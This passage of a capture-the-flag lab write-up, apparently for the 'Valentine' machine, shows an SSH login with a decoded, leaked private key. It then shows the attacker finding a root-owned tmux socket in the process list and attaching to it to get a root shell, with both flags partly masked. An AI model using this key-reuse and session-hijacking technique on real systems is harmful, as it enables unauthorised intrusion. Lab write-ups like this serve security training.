This is hexadecimal encoding. If we use a hexa decoder as https://cryptii.com/pipes/hex-decoder

We get this:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

$ ssh -i priv_key.txt hype@10.10.10.79

load pubkey "priv_key.txt": invalid format
Enter passphrase for key 'priv_key.txt': 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$

hype@Valentine:~$ cd /home/
hype@Valentine:/home$ ls

hype

hype@Valentine:/home$ cd hype/
hype@Valentine:~$ ls

Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

hype@Valentine:~$ cd Desktop/
hype@Valentine:~/Desktop$ cat user.txt

e671XXXXXXXXXXXXXXXXXXXXXXXXXXXX

hype@Valentine:~/Desktop$ ps aux

USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root          1  0.0  0.2  24432  2420 ?        Ss   Aug24   0:00 /sbin/init
root          2  0.0  0.0      0     0 ?        S    Aug24   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    Aug24   0:03 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S    Aug24   0:00 [kworker/u:0]
root          6  0.0  0.0      0     0 ?        S    Aug24   0:00 [migration/0]
root          7  0.0  0.0      0     0 ?        S    Aug24   0:00 [watchdog/0]
root          8  0.0  0.0      0     0 ?        S<   Aug24   0:00 [cpuset]
root          9  0.0  0.0      0     0 ?        S<   Aug24   0:00 [khelper]
root         10  0.0  0.0      0     0 ?        S    Aug24   0:00 [kdevtmpfs]
root         11  0.0  0.0      0     0 ?        S<   Aug24   0:00 [netns]
root         12  0.0  0.0      0     0 ?        S    Aug24   0:00 [sync_supers]
root         13  0.0  0.0      0     0 ?        S    Aug24   0:00 [bdi-default]
root         14  0.0  0.0      0     0 ?        S<   Aug24   0:00 [kintegrityd]
root         15  0.0  0.0      0     0 ?        S<   Aug24   0:00 [kblockd]
root         16  0.0  0.0      0     0 ?        S<   Aug24   0:00 [ata_sff]
root         17  0.0  0.0      0     0 ?        S    Aug24   0:00 [khubd]
root         18  0.0  0.0      0     0 ?        S<   Aug24   0:00 [md]
root         19  0.0  0.0      0     0 ?        S    Aug24   0:00 [kworker/u:1]
root         21  0.0  0.0      0     0 ?        S    Aug24   0:00 [khungtaskd]
root         22  0.0  0.0      0     0 ?        S    Aug24   0:00 [kswapd0]
root         23  0.0  0.0      0     0 ?        SN   Aug24   0:00 [ksmd]
root         24  0.0  0.0      0     0 ?        SN   Aug24   0:00 [khugepaged]
root         25  0.0  0.0      0     0 ?        S    Aug24   0:00 [fsnotify_mark]
root         26  0.0  0.0      0     0 ?        S    Aug24   0:00 [ecryptfs-kthrea]
root         27  0.0  0.0      0     0 ?        S<   Aug24   0:00 [crypto]
root         35  0.0  0.0      0     0 ?        S<   Aug24   0:00 [kthrotld]
root         37  0.0  0.0      0     0 ?        S    Aug24   0:00 [scsi_eh_0]
root         38  0.0  0.0      0     0 ?        S    Aug24   0:00 [scsi_eh_1]
root         59  0.0  0.0      0     0 ?        S<   Aug24   0:00 [devfreq_wq]
root        155  0.0  0.0      0     0 ?        S    Aug24   0:00 [scsi_eh_2]
root        158  0.0  0.0      0     0 ?        S<   Aug24   0:00 [vmw_pvscsi_wq_2]
root        219  0.0  0.0      0     0 ?        S    Aug24   0:00 [jbd2/sda1-8]
root        220  0.0  0.0      0     0 ?        S<   Aug24   0:00 [ext4-dio-unwrit]
root        304  0.0  0.0  17224   640 ?        S    Aug24   0:00 upstart-udev-bridge --daemon
root        307  0.0  0.1  22140  1924 ?        Ss   Aug24   0:00 /sbin/udevd --daemon
root        530  0.0  0.0      0     0 ?        S<   Aug24   0:00 [kpsmoused]
root        572  0.0  0.0  15180   396 ?        S    Aug24   0:00 upstart-socket-bridge --daemon
root        643  0.0  0.1  22120  1472 ?        S    Aug24   0:00 /sbin/udevd --daemon
root        644  0.0  0.1  22124  1460 ?        S    Aug24   0:00 /sbin/udevd --daemon
syslog      707  0.0  0.1 249464  1552 ?        Sl   Aug24   0:02 rsyslogd -c5
102         725  0.0  0.1  24088  1240 ?        Ss   Aug24   0:00 dbus-daemon --system --fork --activation=upstart
root        738  0.0  0.3  79036  3200 ?        Ss   Aug24   0:00 /usr/sbin/modem-manager
root        747  0.0  0.1  21180  1720 ?        Ss   Aug24   0:00 /usr/sbin/bluetoothd
avahi       765  0.0  0.1  32300  1760 ?        S    Aug24   0:00 avahi-daemon: running [Valentine.local]
avahi       766  0.0  0.0  32172   468 ?        S    Aug24   0:00 avahi-daemon: chroot helper
root        772  0.0  0.6 174444  6528 ?        Ssl  Aug24   0:01 NetworkManager
root        785  0.0  0.0      0     0 ?        S<   Aug24   0:00 [krfcommd]
root        787  0.0  0.3 104088  3692 ?        Ss   Aug24   0:00 /usr/sbin/cupsd -F
root        807  0.0  0.3 203500  3888 ?        Sl   Aug24   0:01 /usr/lib/policykit-1/polkitd --no-debug
root        860  0.0  0.0      0     0 ?        S    Aug24   0:00 [flush-8:0]
root        916  0.0  0.2  49952  2860 ?        Ss   Aug24   0:00 /usr/sbin/sshd -D
root       1004  0.0  0.0  19976   972 tty4     Ss+  Aug24   0:00 /sbin/getty -8 38400 tty4
root       1013  0.0  0.0  19976   976 tty5     Ss+  Aug24   0:00 /sbin/getty -8 38400 tty5
root       1020  0.0  0.1  26416  1668 ?        Ss   Aug24   0:27 /usr/bin/tmux -S /.devs/dev_sess
root       1025  0.0  0.4  20652  4584 pts/15   Ss+  Aug24   0:00 -bash
root       1027  0.0  0.0  19976   980 tty2     Ss+  Aug24   0:00 /sbin/getty -8 38400 tty2
root       1028  0.0  0.0  19976   976 tty3     Ss+  Aug24   0:00 /sbin/getty -8 38400 tty3
root       1034  0.0  0.0  19976   968 tty6     Ss+  Aug24   0:00 /sbin/getty -8 38400 tty6
root       1056  0.0  0.0   4452   808 ?        Ss   Aug24   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root       1058  0.0  0.1  19104  1036 ?        Ss   Aug24   0:00 cron
daemon     1059  0.0  0.0  16900   372 ?        Ss   Aug24   0:00 atd
whoopsie   1062  0.0  0.6 203836  6184 ?        Ssl  Aug24   0:00 whoopsie
root       1102  0.0  0.4 162284  4324 ?        Sl   Aug24   0:59 /usr/bin/vmtoolsd
root       1277  0.0  1.0 113124 10976 ?        Ss   Aug24   0:03 /usr/sbin/apache2 -k start
root       1448  0.0  0.0  19976   976 tty1     Ss+  Aug24   0:00 /sbin/getty -8 38400 tty1
root       1605  0.0  1.0  66916 10304 ?        S    Aug24   0:00 /usr/lib/vmware-vgauth/VGAuthService -s
root       1640  0.0  0.5 510152  5520 ?        Sl   Aug24   0:26 //usr/lib/vmware-caf/pme/bin/ManagementAgentHost
root       5205  0.0  0.0      0     0 ?        S    01:39   0:10 [kworker/0:2]
www-data   5831  0.0  0.8 113756  8776 ?        S    01:56   0:00 /usr/sbin/apache2 -k start
www-data   5853  0.0  0.8 113868  9004 ?        S    01:57   0:00 /usr/sbin/apache2 -k start
www-data   5869  0.0  0.8 113868  8920 ?        S    01:57   0:00 /usr/sbin/apache2 -k start
www-data   5923  0.0  0.9 113996  9080 ?        S    01:58   0:00 /usr/sbin/apache2 -k start
www-data   6654  0.0  0.8 113884  8520 ?        S    06:52   0:00 /usr/sbin/apache2 -k start
www-data   6655  0.0  0.8 113884  8516 ?        S    06:52   0:00 /usr/sbin/apache2 -k start
www-data   6657  0.0  0.8 113884  8512 ?        S    06:52   0:00 /usr/sbin/apache2 -k start
www-data   6658  0.0  0.8 113884  8540 ?        S    06:52   0:00 /usr/sbin/apache2 -k start
www-data   6659  0.0  0.8 113900  8764 ?        S    06:52   0:00 /usr/sbin/apache2 -k start
www-data   6660  0.0  0.8 113908  8520 ?        S    06:52   0:00 /usr/sbin/apache2 -k start
root       7019  0.0  0.0      0     0 ?        S    08:05   0:00 [kworker/0:0]
root       7028  0.0  0.3  92220  3972 ?        Ss   08:08   0:00 sshd: hype [priv]   
root       7037  0.0  0.3 584296  3840 ?        Sl   08:09   0:00 /usr/sbin/console-kit-daemon --no-daemon
hype       7245  0.0  0.1  92220  1664 ?        S    08:09   0:00 sshd: hype@pts/0    
hype       7246  0.1  0.8  31644  8760 pts/0    Ss   08:09   0:00 -bash
root       7396  0.0  0.0      0     0 ?        S    08:10   0:00 [kworker/0:1]
hype       7406  0.0  0.1  22352  1280 pts/0    R+   08:13   0:00 ps aux
hype@Valentine:~/Desktop$

There is a tmux session that we can use.

root       1020  0.0  0.1  26416  1668 ?        Ss   Aug24   0:27 /usr/bin/tmux -S /.devs/dev_sess

hype@Valentine:~$ tmux -S /.devs/dev_sess

root@Valentine:/home/hype#

root@Valentine:/home/hype# cd /root
root@Valentine:~# cat root.txt

f1bbXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *